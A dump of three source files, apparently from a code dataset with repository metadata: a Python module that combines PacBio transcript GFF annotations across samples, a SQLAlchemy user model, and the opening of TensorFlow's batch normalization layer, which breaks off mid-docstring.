ArthurDondi/cDNA_Cupcake
|
528b9593b0ad166ac720be7c5c07a968730a2ce2
|
[
"BSD-3-Clause-Clear"
] | 205
|
2016-07-13T06:26:20.000Z
|
2022-03-03T06:29:43.000Z
|
cupcake/tofu/counting/combine_abundance_across_samples.py
|
ArthurDondi/cDNA_Cupcake
|
528b9593b0ad166ac720be7c5c07a968730a2ce2
|
[
"BSD-3-Clause-Clear"
] | 186
|
2017-02-22T22:46:46.000Z
|
2022-03-23T16:16:15.000Z
|
cupcake/tofu/counting/combine_abundance_across_samples.py
|
ArthurDondi/cDNA_Cupcake
|
528b9593b0ad166ac720be7c5c07a968730a2ce2
|
[
"BSD-3-Clause-Clear"
] | 93
|
2016-08-31T02:24:52.000Z
|
2022-02-24T14:01:27.000Z
|
__author__ = 'etseng@pacb.com'
import os, sys, re, time
import pdb
from csv import DictWriter
from Bio import SeqIO
from collections import defaultdict, namedtuple
from cupcake.tofu import compare_junctions
from cupcake.io import GFF
from bx.intervals import IntervalTree
from bx.intervals.cluster import ClusterTree
seqid_rex = re.compile('(\S+\\.\d+)\\.(\d+)')
MatchRecord = namedtuple('MatchRecord', ['ref_id', 'addon_id', 'rec', 'members', 'seqrec'])
def find_representative_in_iso_list(records):
    """
    :param records: list of GMAPRecord
    :return: representative record that is (a) the most number of exons or then (b) longest

    Bug fix: the original used a plain ``or`` between the two criteria, so a
    record with *fewer* exons could replace the representative merely by
    spanning a longer genomic range, contradicting the documented policy.
    Length is now only used as a tie-break when exon counts are equal.
    """
    rep = records[0]
    for r in records[1:]:
        # More exons wins outright; equal exon counts fall back to span.
        if (len(r.ref_exons) > len(rep.ref_exons) or
                (len(r.ref_exons) == len(rep.ref_exons) and
                 (r.end - r.start) > (rep.end - rep.start))):
            rep = r
    return rep
def sanity_check_seqids(seqids):
    """Abort the whole program unless every ID matches PB.<gene>.<isoform>."""
    for seqid in seqids:
        if seqid_rex.match(seqid) is None:
            print("Expected ID format (ex: PB.1.2) not followed by {0}! Abort!".format(seqid), file=sys.stderr)
            sys.exit(-1)
def get_fusion_id(seqid):
    """Return the gene-level prefix (ex: 'PB.1') of a PB.<gene>.<iso> ID."""
    return seqid_rex.match(seqid).group(1)
def write_reclist_to_gff_n_info(rec_list, final_prefix, ref_name, addon_name, use_fq=False):
    """Write combined records to <prefix>.gff/.mega_info.txt/.group.txt (and
    optionally .rep.fq), assigning fresh PB.<gene>.<isoform> IDs ordered by
    chromosome, strand, and genomic position.

    Returns a dict mapping the new PBID to its member sequence IDs.
    """
    # now go through the rec list and figure out in what order we are outputting the total records
    # Cluster overlapping records per chromosome/strand; ClusterTree(0,0)
    # merges any overlap, each region becoming one PB gene.
    tree = defaultdict(lambda: {'+':ClusterTree(0,0), '-':ClusterTree(0,0)})

    tree_keys_numeric = set()
    tree_keys_alpha = set()
    for i,match_rec in enumerate(rec_list):
        tree[match_rec.rec.chr][match_rec.rec.strand].insert(match_rec.rec.start, match_rec.rec.end, i)

    # Sort chromosome names numerically where possible, then alphabetically.
    for chrom in tree:
        try:
            k = int(chrom)
            tree_keys_numeric.add(k)
        except ValueError:
            tree_keys_alpha.add(chrom)
    tree_keys = sorted(list(tree_keys_numeric)) + sorted(list(tree_keys_alpha))

    f_gff = open(final_prefix+'.gff', 'w')
    f_info = open(final_prefix+'.mega_info.txt', 'w')
    writer_info = DictWriter(f_info, fieldnames=['superPBID', ref_name, addon_name], delimiter='\t')
    writer_info.writeheader()
    f_group = open(final_prefix+'.group.txt', 'w')
    if use_fq:
        f_fq = open(final_prefix+'.rep.fq', 'w')

    # sort the combined gff (tree) by chromosome and strand (- first)
    new_group_info = {}

    pb_i = 0  # gene counter; each clustered region becomes PB.<pb_i>
    for _chr in tree_keys:
        # remember to convert potential integer chromsomes keys back to string now that we sorted them!
        _chr = str(_chr)
        for _strand in ('+', '-'):
            for _start,_end,_indices in tree[_chr][_strand].getregions():
                # further sort these records by (start, end, num_exons)
                _indices.sort(key=lambda i: (rec_list[i].rec.start, rec_list[i].rec.end, len(rec_list[i].rec.ref_exons)))
                pb_i += 1
                for pb_j, recs_index in enumerate(_indices):
                    pbgene = "PB.{0}".format(pb_i)
                    pbid = "PB.{0}.{1}".format(pb_i, pb_j + 1)
                    match_rec = rec_list[recs_index]
                    new_group_info[pbid] = match_rec.members
                    match_rec.rec.seqid = pbid
                    match_rec.rec.geneid = pbgene
                    # Emit the renamed record plus its ref/addon provenance
                    # and member list; optionally its representative FASTQ.
                    GFF.write_collapseGFF_format(f_gff, match_rec.rec)
                    writer_info.writerow({'superPBID': pbid, ref_name: match_rec.ref_id, addon_name: match_rec.addon_id})
                    f_group.write("{0}\t{1}\n".format(pbid, ",".join(match_rec.members)))
                    if use_fq:
                        match_rec.seqrec.id = pbid
                        match_rec.seqrec.description = ''
                        SeqIO.write(match_rec.seqrec, f_fq, 'fastq')
    f_gff.close()
    f_info.close()
    f_group.close()
    if use_fq:
        f_fq.close()
    return new_group_info
class MegaPBTree(object):
    """
    Structure for maintaining a non-redundant set of gene annotations
    Used to combine with different collapsed GFFs from different samples

    Attributes set up in __init__:
      record_d   -- dict of seqid (ex: "PB.1.2") --> GFF record read from gff_filename
      tree       -- dict of chr --> strand ('+'/'-') --> IntervalTree of GFF records
      fastq_dict -- optional dict of seqid --> representative SeqRecord (None if no FASTQ given)
      group_info -- dict of seqid --> list of member IDs (optionally prefixed with self_prefix)
    """
    def __init__(self, gff_filename, group_filename, internal_fuzzy_max_dist=0, self_prefix=None, allow_5merge=False, fastq_filename=None, max_3_diff=None):
        """
        gff_filename -- collapsed GFF of the current (reference) sample
        group_filename -- membership file: <pbid> TAB <comma-separated members>
        internal_fuzzy_max_dist -- max bp wobble tolerated at internal exon junctions
        self_prefix -- optional sample prefix prepended to member IDs (ex: "RatHeart|...")
        allow_5merge -- if True, a 5' truncated isoform may merge with a longer match
        fastq_filename -- optional FASTQ of representative sequences
        max_3_diff -- optional max bp difference tolerated at the 3' end (None = no check)
        """
        self.gff_filename = gff_filename
        self.group_filename = group_filename
        self.self_prefix = self_prefix
        self.internal_fuzzy_max_dist = internal_fuzzy_max_dist
        self.max_3_diff = max_3_diff
        self.allow_5merge = allow_5merge
        self.record_d = dict((r.seqid, r) for r in GFF.collapseGFFReader(gff_filename))
        #sanity_check_seqids(self.record_d.keys()) # sanity check all IDs look like PB.1.2
        self.tree = defaultdict(lambda: {'+':IntervalTree(), '-':IntervalTree()}) # chr --> strand --> tree
        self.fastq_dict = None
        if fastq_filename is not None:
            self.fastq_dict = MegaPBTree.read_fastq_to_dict(fastq_filename)
        #print >> sys.stderr, "self.internal_fuzzy_max_dist is", internal_fuzzy_max_dist
        #raw_input()
        self.read_gff_as_interval_tree()
        self.group_info = MegaPBTree.read_group(self.group_filename, self.self_prefix) # ex: PB.1.1 --> [ RatHeart|i3_c123.... ]
    def read_gff_as_interval_tree(self):
        """
        Read a collapsed GFF file into an IntervalTree
        (one tree per chromosome/strand; each record indexed by its genomic span).
        """
        for r in GFF.collapseGFFReader(self.gff_filename):
            self.tree[r.chr][r.strand].insert(r.start, r.end, r)
    @staticmethod
    def read_fastq_to_dict(fastq_filename):
        """Read a FASTQ file into a dict of id --> SeqRecord.

        Only the portion of the record id before the first '|' is used as key.
        """
        fastq_dict = {}
        for r in SeqIO.parse(open(fastq_filename), 'fastq'):
            fastq_dict[r.id.split('|')[0]] = r
        return fastq_dict
    @staticmethod
    def read_group(group_filename, group_prefix):
        """Read a group file (<pbid> TAB <comma-separated members>) into a dict.

        Returns pbid --> [members]; if group_prefix is not None, each member
        becomes "<group_prefix>|<member>".
        """
        group_info = {}
        with open(group_filename) as f:
            for line in f:
                pbid, members = line.strip().split('\t')
                if group_prefix is None:
                    group_info[pbid] = [x for x in members.split(',')]
                else:
                    group_info[pbid] = [group_prefix+'|'+x for x in members.split(',')]
        return group_info
    def match_record_to_tree(self, r):
        """
        r --- GMAPRecord
        tree --- dict of chromosome --> strand --> IntervalTree
        If exact match (every exon junction) or 5' truncated (allow_5merge is True), YIELD the matching GMAPRecord(s)
        *NOTE/UPDATE*: could have multiple matches! )

        Side effect: attaches a .segments attribute (alias of .ref_exons) onto
        both r and each candidate record, as required by compare_junctions.
        """
        #if r.chr=='chr17' and r.start > 39604000:
        #    pdb.set_trace()
        matches = self.tree[r.chr][r.strand].find(r.start, r.end)
        for r2 in matches:
            r.segments = r.ref_exons
            r2.segments = r2.ref_exons
            n1 = len(r.segments)
            n2 = len(r2.segments)
            # 3' ends must agree within max_3_diff (strand-aware); a None
            # max_3_diff disables the check entirely.
            three_end_is_match = self.max_3_diff is None or \
                                 (r.strand=='+' and abs(r.end-r2.end)<=self.max_3_diff) or \
                                 (r.strand=='-' and abs(r.start-r2.start)<=self.max_3_diff)
            # last_junction_match: used only for the 5'-merge case below.
            # Single-exon vs multi-exon pairs can never share a junction.
            last_junction_match = False
            if n1 == 1:
                if n2 == 1: last_junction_match = True
                else: last_junction_match = False
            else:
                if n2 == 1: last_junction_match = False
                else:
                    if r.strand == '+':
                        last_junction_match = (abs(r.segments[-1].start-r2.segments[-1].start) <= self.internal_fuzzy_max_dist) and \
                                              (abs(r.segments[0].end-r2.segments[0].end) <= self.internal_fuzzy_max_dist)
                    else:
                        # NOTE(review): on '-' strand this compares the first
                        # genomic junction (segments[0].end / segments[1].start),
                        # i.e. the transcript's last junction -- confirm intended.
                        last_junction_match = (abs(r.segments[0].end-r2.segments[0].end) <= self.internal_fuzzy_max_dist) and \
                                              (abs(r.segments[1].start-r2.segments[1].start) <= self.internal_fuzzy_max_dist)
            if compare_junctions.compare_junctions(r, r2, internal_fuzzy_max_dist=self.internal_fuzzy_max_dist) == 'exact': # is a match!
                if three_end_is_match:
                    yield r2
            elif self.allow_5merge: # check if the shorter one is a subset of the longer one
                if len(r.segments) > len(r2.segments):
                    a, b = r, r2
                else:
                    a, b = r2, r
                # a is the longer one, b is the shorter one
                if compare_junctions.compare_junctions(b, a, internal_fuzzy_max_dist=self.internal_fuzzy_max_dist) == 'subset':
                    # we only know that a is a subset of b, verify that it is actually 5' truncated (strand-sensitive!)
                    # if + strand, last junction of (a,b) should match and 3' end not too diff
                    # if - strand, first exon of a should match first exon of b AND the next exon don't overlap
                    if three_end_is_match and last_junction_match:
                        yield r2
    def add_sample(self, gff_filename, group_filename, sample_prefix, output_prefix, fastq_filename=None):
        """
        Combine a new sample (gff/group/optional fastq) with the current tree.

        Each incoming record is matched against the tree; matched pairs, new
        records, and leftover tree records are all collected, re-clustered by
        locus with a ClusterTree, and written out via write_cluster_tree_as_gff.
        """
        combined = [] # list of (<matches to r2 or None>, r2)
        unmatched_recs = set(self.record_d.keys())
        for r in GFF.collapseGFFReader(gff_filename):
            match_rec_list = [x for x in self.match_record_to_tree(r)]
            if len(match_rec_list) > 0: # found match(es)! put longer of r1/r2 in
                #if len(match_rec_list) > 1: pdb.set_trace() #DEBUG
                combined.append((match_rec_list, r))
                for match_rec in match_rec_list:
                    try:
                        unmatched_recs.remove(match_rec.seqid)
                    except KeyError:
                        pass # already deleted, OK, this can happen
            else: # r is not present in current tree
                combined.append((None, r))
        # put whatever is left from the tree in
        for seqid in unmatched_recs:
            combined.append(([self.record_d[seqid]], None))
        # create a ClusterTree to re-calc the loci/transcripts
        final_tree = defaultdict(lambda: {'+': ClusterTree(0, 0), '-':ClusterTree(0, 0)})
        for i,(r1s,r2) in enumerate(combined):
            if r1s is None:
                final_tree[r2.chr][r2.strand].insert(r2.start, r2.end, i)
            else:
                # cluster on the representative isoform's span
                if r2 is not None:
                    rep = find_representative_in_iso_list(r1s + [r2])
                else:
                    rep = find_representative_in_iso_list(r1s)
                final_tree[rep.chr][rep.strand].insert(rep.start, rep.end, i)
        self.write_cluster_tree_as_gff(final_tree, combined, group_filename, sample_prefix, output_prefix, fastq_filename2=fastq_filename)
    def write_cluster_tree_as_gff(self, cluster_tree, rec_list, group_filename2, sample_prefix2, output_prefix, fastq_filename2=None):
        """
        Write ClusterTree (chr --> dict --> (start, end, rec_list_index)) as collapsedGFF format
        Returns --- a new group_info!!!

        rec_list entries are (r1s, r2) pairs where either side may be None;
        they are first converted into MatchRecord tuples, then serialized by
        the module-level write_reclist_to_gff_n_info helper.
        """
        # FASTQ output only makes sense if both sides have sequences available.
        use_fq = fastq_filename2 is not None and self.fastq_dict is not None
        if use_fq:
            fastq_dict2 = MegaPBTree.read_fastq_to_dict(fastq_filename2)
        group_info2 = MegaPBTree.read_group(group_filename2, sample_prefix2)
        # currently: rec_list is (r1s, r2) where r1s, r2 are records and could be None
        # make rec_list into list of MatchRec (ref_id, addon_id, representative rec, seqrec, group_info members)
        new_rec_list = []
        for r1s, r2 in rec_list:
            if r2 is None:
                # reference-only records (no match in the new sample)
                for r1 in r1s:
                    new_rec_list.append(MatchRecord(ref_id=r1.seqid, addon_id="NA", rec=r1, members=self.group_info[r1.seqid],
                                                    seqrec=self.fastq_dict[r1.seqid] if use_fq else None))
            elif r1s is None:
                # new-sample-only record (no match in the reference tree)
                new_rec_list.append(MatchRecord(ref_id="NA", addon_id=r2.seqid, rec=r2, members=group_info2[r2.seqid],
                                                seqrec=fastq_dict2[r2.seqid] if use_fq else None))
            else:
                # matched on both sides: keep the representative of each pair
                for r1 in r1s:
                    if len(r1s)>1: print("matching {0} to {1}".format(r1, r2), file=sys.stderr)
                    rep = find_representative_in_iso_list([r1, r2])
                    new_rec_list.append(MatchRecord(ref_id=r1.seqid,
                                                    addon_id=r2.seqid,
                                                    rec=rep,
                                                    members=self.group_info[r1.seqid]+group_info2[r2.seqid],
                                                    seqrec=self.fastq_dict[rep.seqid] if use_fq else None))
                #rep = find_representative_in_iso_list(r1s + [r2])
                #all_members = group_info2[r2.seqid]
                #for r1 in r1s: all_members += self.group_info[r1.seqid]
                #new_rec_list.append(MatchRecord(ref_id=",".join(r1.seqid for r1 in r1s),
                #                                addon_id=r2.seqid,
                #                                rec=rep,
                #                                members=all_members,
                #                                seqrec=self.fastq_dict[rep.seqid] if use_fq else None))
                #pdb.set_trace()
        new_group_info = write_reclist_to_gff_n_info(new_rec_list, output_prefix, self.self_prefix, sample_prefix2, use_fq)
        return new_group_info
class MegaPBTreeFusion(MegaPBTree):
    """
    Fusion-transcript variant of MegaPBTree.

    A fusion is an ordered list of GFF records (loci), possibly spanning
    multiple chromosomes; matching therefore happens per-locus and then
    per-fusion (check_records_match).
    """
    def __init__(self, gff_filename, group_filename, internal_fuzzy_max_dist=0, self_prefix=None, fastq_filename=None, fusion_max_dist=10):
        """
        Differences with non-fusion MegaPBTree:
        1. allow_5merge is always FALSE. Not a parameter.
        2. fusion_max_dist --- maximum allowed distance on internal fusion sites to be called as equivalent fusions
        """
        super(MegaPBTreeFusion, self).__init__(gff_filename, group_filename, internal_fuzzy_max_dist, self_prefix, False, fastq_filename)
        self.fusion_max_dist = fusion_max_dist
        # ex: PBfusion.1 -> [PBfusion.1.1, PBfusion.1.2]
        self.record_d_fusion = dict((fusion_id, records) for fusion_id,records in GFF.collapseGFFFusionReader(gff_filename))
    def junction_match_check_5(self, r1, r2):
        """True iff the 5' ends of r1/r2 agree within fusion_max_dist (strand-aware)."""
        if r1.strand == '+':
            return abs(r1.ref_exons[0].start-r2.ref_exons[0].start) <= self.fusion_max_dist
        else:
            return abs(r1.ref_exons[-1].end-r2.ref_exons[-1].end) <= self.fusion_max_dist
    def junction_match_check_3(self, r1, r2):
        """True iff the 3' ends of r1/r2 agree within fusion_max_dist (strand-aware)."""
        if r1.strand == '+':
            return abs(r1.ref_exons[-1].end-r2.ref_exons[-1].end) <= self.fusion_max_dist
        else:
            return abs(r1.ref_exons[0].start-r2.ref_exons[0].start) <= self.fusion_max_dist
    def match_record_to_tree(self, r, check_5_dist, check_3_dist):
        """
        Matching a single record (locus).
        Major diff from non-fusion version:
        1. there could be multiple matches!
        2. no 5merge allowed
        3. additionally checks if the 5'/3' ends don't disagree too much (fusion_max_dist). this is used for fusion junctions.
        4. need to take care that fusions can be multi-chromosome! write output correctly!!!

        Returns a list of matching seqids (not records, unlike the parent class).
        """
        matches = self.tree[r.chr][r.strand].find(r.start, r.end)
        result = []
        for r2 in matches:
            r.segments = r.ref_exons
            r2.segments = r2.ref_exons
            if compare_junctions.compare_junctions(r, r2, internal_fuzzy_max_dist=self.internal_fuzzy_max_dist) == 'exact' and \
                (not check_5_dist or self.junction_match_check_5(r, r2)) and \
                (not check_3_dist or self.junction_match_check_3(r, r2)): # is a match!
                result.append(r2.seqid)
        return result
    def check_records_match(self, records1, records2):
        """
        records1, records2 are two fusion records.
        They match iff:
        1. same number of records
        2. each record (a loci) matches

        End checks per locus: first locus needs only the 3' side to agree,
        last locus only the 5' side, internal loci need both.
        """
        if len(records1)!=len(records2): return False
        i = 0
        for r1, r2 in zip(records1, records2):
            # check: chr, strand, exons match
            if r1.chr!=r2.chr or r1.strand!=r2.strand: return False
            r1.segments = r1.ref_exons
            r2.segments = r2.ref_exons
            if compare_junctions.compare_junctions(r1, r2, internal_fuzzy_max_dist=self.internal_fuzzy_max_dist)!='exact':
                return False
            if i == 0: # first record, only need 3' to agree
                if not self.junction_match_check_3(r1, r2): return False
            elif i == len(records1)-1: #last record, only need 5' to agree
                if not self.junction_match_check_5(r1, r2): return False
            else:
                if not self.junction_match_check_5(r1, r2): return False
                if not self.junction_match_check_3(r1, r2): return False
            i += 1
        return True
    def match_fusion_record(self, records):
        """
        records --- in order, the records of a single fusion.

        Returns the matching fusion_id (ex: "PBfusion.1") or None. Exits with
        an error if more than one candidate matches (should not happen).
        """
        good = []
        # match the first record, requiring additionally that the precise 3' end matches
        cands = self.match_record_to_tree(records[0], check_5_dist=False, check_3_dist=True)
        # for each candidate (ex: PB.8.1, extract the full set of records and match them)
        for cand in cands:
            m = seqid_rex.match(cand)
            fusion_id = m.group(1)
            if self.check_records_match(records, self.record_d_fusion[fusion_id]):
                good.append(fusion_id)
        if len(good) == 0:
            return None
        elif len(good) == 1:
            return good[0]
        else:
            print("ERROR! more than one possible candidate in match_fusion_record! DEBUG.", file=sys.stderr)
            print("MATCHED:", good, file=sys.stderr)
            sys.exit(-1)
    def add_sample(self, gff_filename, group_filename, sample_prefix, output_prefix, fastq_filename=None):
        """
        Fusion version of add_sample: match whole fusions (record lists)
        instead of single records, then re-cluster and write output.
        """
        combined = [] # list of (r1 if r2 is None | r2 if r1 is None | longer of r1 or r2 if both not None)
        unmatched_recs = list(self.record_d_fusion.keys())
        for _id, records in GFF.collapseGFFFusionReader(gff_filename):
            match_seqid = self.match_fusion_record(records)
            if match_seqid is not None:
                combined.append((self.record_d_fusion[match_seqid], records))
                try:
                    unmatched_recs.remove(match_seqid)
                except ValueError:
                    pass # already deleted, OK, this happens for single-exon transcripts
            else: # r is not present in current tree
                combined.append((None, records))
        # put whatever is left from the tree in
        for seqid in unmatched_recs:
            combined.append((self.record_d_fusion[seqid], None))
        # create a ClusterTree to re-calc the loci/transcripts
        final_tree = defaultdict(lambda: {'+': ClusterTree(0, 0), '-':ClusterTree(0, 0)})
        for i,(r1s,r2s) in enumerate(combined):
            # cluster on the first locus of whichever side spans more sequence
            if r2s is None or (r1s is not None and r1s[0].end-r1s[0].start > r2s[0].end-r2s[0].start):
                final_tree[r1s[0].chr][r1s[0].strand].insert(r1s[0].start, r1s[0].end, i)
            else:
                final_tree[r2s[0].chr][r2s[0].strand].insert(r2s[0].start, r2s[0].end, i)
        self.write_cluster_tree_as_gff(final_tree, combined, group_filename, sample_prefix, output_prefix, fastq_filename2=fastq_filename)
    def write_cluster_tree_as_gff(self, cluster_tree, rec_list, group_filename2, sample_prefix2, output_prefix, fastq_filename2=None):
        """
        Write ClusterTree (chr --> dict --> (start, end, rec_list_index)) as collapsedGFF format
        Returns --- a new group_info!!!

        Outputs: <prefix>.gff, <prefix>.group.txt, <prefix>.mega_info.txt and,
        if a FASTQ was provided, <prefix>.rep.fq. Fusion IDs are renumbered
        sequentially as "PBfusion.<n>".
        """
        if fastq_filename2 is not None:
            fastq_dict2 = MegaPBTree.read_fastq_to_dict(fastq_filename2)
            f_fastq = open(output_prefix+'.rep.fq', 'w')
        group_info2 = MegaPBTree.read_group(group_filename2, sample_prefix2)
        new_group_info = {}
        f_out = open(output_prefix+'.gff', 'w')
        f_group = open(output_prefix+'.group.txt', 'w')
        f_mgroup = open(output_prefix + '.mega_info.txt', 'w')
        f_mgroup.write("pbid\t{0}\t{1}\n".format(self.self_prefix, sample_prefix2))
        fusion_index = 0
        chroms = list(cluster_tree.keys())
        chroms.sort()
        for k in chroms: # IMPORTANT: for fusion, this is *just* the chrom of the first record! Fusions can be multi-chrom
            for strand in ('+', '-'):
                for _s, _e, rec_indices in cluster_tree[k][strand].getregions():
                    for i in rec_indices:
                        fusion_index += 1
                        tID = "PBfusion.{i}".format(i=fusion_index)
                        r1s, r2s = rec_list[i]
                        if r1s is None: # r2s is not None
                            recs = r2s
                            r2_fusion_id = get_fusion_id(r2s[0].seqid)
                            new_group_info[tID] = group_info2[r2_fusion_id]
                            f_mgroup.write("{tID}\tNA\t{group}\n".format(tID=tID, group=r2_fusion_id))
                            if fastq_filename2 is not None:
                                seqrec = fastq_dict2[r2_fusion_id]
                        elif r2s is None: # r1 is not None
                            recs = r1s
                            r1_fusion_id = get_fusion_id(r1s[0].seqid)
                            new_group_info[tID] = self.group_info[r1_fusion_id]
                            f_mgroup.write("{tID}\t{group}\tNA\n".format(tID=tID, group=r1_fusion_id))
                            if fastq_filename2 is not None:
                                seqrec = self.fastq_dict[r1_fusion_id]
                        else: # both r1, r2 are not empty
                            r1_fusion_id = get_fusion_id(r1s[0].seqid)
                            r2_fusion_id = get_fusion_id(r2s[0].seqid)
                            # keep the sequence of whichever fusion covers more bases
                            r1_len = sum(x.end-x.start for x in r1s)
                            r2_len = sum(x.end-x.start for x in r2s)
                            if r1_len > r2_len:
                                recs = r1s
                                if fastq_filename2 is not None:
                                    seqrec = self.fastq_dict[r1_fusion_id]
                            else:
                                recs = r2s
                                if fastq_filename2 is not None:
                                    seqrec = fastq_dict2[r2_fusion_id]
                            new_group_info[tID] = self.group_info[r1_fusion_id] + group_info2[r2_fusion_id]
                            f_mgroup.write("{tID}\t{group1}\t{group2}\n".format(tID=tID, group1=r1_fusion_id, group2=r2_fusion_id))
                        if fastq_filename2 is not None:
                            seqrec.id = tID
                            SeqIO.write(seqrec, f_fastq, 'fastq')
                        f_group.write("{tID}\t{members}\n".format(tID=tID, members=",".join(new_group_info[tID])))
                        # now write out the fusion transcript
                        for j,r in enumerate(recs):
                            f_out.write("{chr}\tPacBio\ttranscript\t{s}\t{e}\t.\t{strand}\t.\tgene_id \"{gid}\"; transcript_id \"{gid}.{j}\";\n".format(\
                                chr=r.chr, s=r.start+1, e=r.end, strand=strand, gid=tID, j=j+1))
                            for exon in r.ref_exons:
                                f_out.write("{chr}\tPacBio\texon\t{s}\t{e}\t.\t{strand}\t.\tgene_id \"{gid}\"; transcript_id \"{gid}.{j}\";\n".format(\
                                    chr=r.chr, s=exon.start+1, e=exon.end, strand=strand, gid=tID, j=j+1))
        f_out.close()
        f_group.close()
        f_mgroup.close()
        if fastq_filename2 is not None:
            f_fastq.close()
        return new_group_info
| 49.641079
| 156
| 0.579178
|
4a0f2142226ee708fafc387fae09ebd34ce5f505
| 1,133
|
py
|
Python
|
{{cookiecutter.project_name}}/template_minimal/app/models.py
|
rafsaf/respo-fastapi-template
|
1225637fe9301b76670fa84ebe96263e7e7676a7
|
[
"MIT"
] | 75
|
2021-11-11T14:38:22.000Z
|
2022-03-31T14:25:40.000Z
|
{{cookiecutter.project_name}}/template_minimal/app/models.py
|
rafsaf/respo-fastapi-template
|
1225637fe9301b76670fa84ebe96263e7e7676a7
|
[
"MIT"
] | 2
|
2021-11-24T16:45:42.000Z
|
2022-01-30T14:20:38.000Z
|
{{cookiecutter.project_name}}/template_minimal/app/models.py
|
rafsaf/respo-fastapi-template
|
1225637fe9301b76670fa84ebe96263e7e7676a7
|
[
"MIT"
] | 9
|
2021-11-11T14:38:27.000Z
|
2022-03-04T01:47:38.000Z
|
"""
SQL Alchemy models declaration.
https://docs.sqlalchemy.org/en/14/orm/declarative_styles.html#example-two-dataclasses-with-declarative-table
Dataclass style for powerful autocompletion support.
https://alembic.sqlalchemy.org/en/latest/tutorial.html
Note, it is used by alembic migrations logic, see `alembic/env.py`
Alembic shortcuts:
# create migration
alembic revision --autogenerate -m "migration_name"
# apply all migrations
alembic upgrade head
"""
import uuid
from dataclasses import dataclass, field
from sqlalchemy import Column, String
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import registry
# Central declarative-mapping registry; model classes register themselves
# with the @Base.mapped decorator (dataclass-style declarative mapping).
Base = registry()
@Base.mapped
@dataclass
class User:
    """User account row mapped to the ``user_model`` table.

    Dataclass-style declarative mapping: each field's ``metadata["sa"]``
    entry supplies the SQLAlchemy ``Column`` for that attribute.
    """

    __tablename__ = "user_model"
    __sa_dataclass_metadata_key__ = "sa"

    # Primary key generated client-side; init=False keeps it out of __init__.
    id: uuid.UUID = field(
        init=False,
        default_factory=uuid.uuid4,
        metadata={"sa": Column(UUID(as_uuid=True), primary_key=True)},
    )
    # Unique, indexed login identifier (254 chars -- presumably the common
    # max-email-length convention; confirm against validation logic).
    email: str = field(
        metadata={"sa": Column(String(254), nullable=False, unique=True, index=True)}
    )
    # Password hash only -- plaintext passwords are never stored.
    hashed_password: str = field(metadata={"sa": Column(String(128), nullable=False)})
| 26.97619
| 108
| 0.740512
|
4a0f21e2840fc629fc51548b07c467137a56018e
| 28,349
|
py
|
Python
|
tensorflow/python/layers/normalization.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | 1
|
2017-09-08T04:32:21.000Z
|
2017-09-08T04:32:21.000Z
|
tensorflow/python/layers/normalization.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/layers/normalization.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | 1
|
2017-09-12T19:41:26.000Z
|
2017-09-12T19:41:26.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
# pylint: disable=unused-import,g-bad-import-order
"""Contains the normalization layer classes and their functional aliases.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base
from tensorflow.python.layers import utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import moving_averages
# Opt-in default for fused batch norm during its testing period: setting the
# TF_DEFAULT_USES_FUSED_BATCH_NORM env var to "true"/"t"/"1" (case-insensitive)
# makes `fused=None` resolve to True (see BatchNormalization.__init__).
_FUSED_DEFAULT = os.getenv('TF_DEFAULT_USES_FUSED_BATCH_NORM',
                           '').lower() in ('true', 't', '1')
class BatchNormalization(base.Layer):
"""Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Arguments:
axis: Integer, the axis that should be normalized (typically the features
axis). For instance, after a `Conv2D` layer with
`data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
momentum: Momentum for the moving average.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
moving_mean_initializer: Initializer for the moving mean.
moving_variance_initializer: Initializer for the moving variance.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: An optional projection function to be applied to the `beta`
weight after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
gamma_constraint: An optional projection function to be applied to the
`gamma` weight after being updated by an `Optimizer`.
renorm: Whether to use Batch Renormalization
(https://arxiv.org/abs/1702.03275). This adds extra variables during
training. The inference is the same for either value of this parameter.
renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
scalar `Tensors` used to clip the renorm correction. The correction
`(r, d)` is used as `corrected_value = normalized_value * r + d`, with
`r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
dmax are set to inf, 0, inf, respectively.
renorm_momentum: Momentum used to update the moving means and standard
deviations with renorm. Unlike `momentum`, this affects training
and should be neither too small (which would add noise) nor too large
(which would give stale estimates). Note that `momentum` is still applied
to get the means and variances for inference.
fused: if `True`, use a faster, fused implementation if possible.
If `None`, use the system recommended implementation.
trainable: Boolean, if `True` also add variables to the graph collection
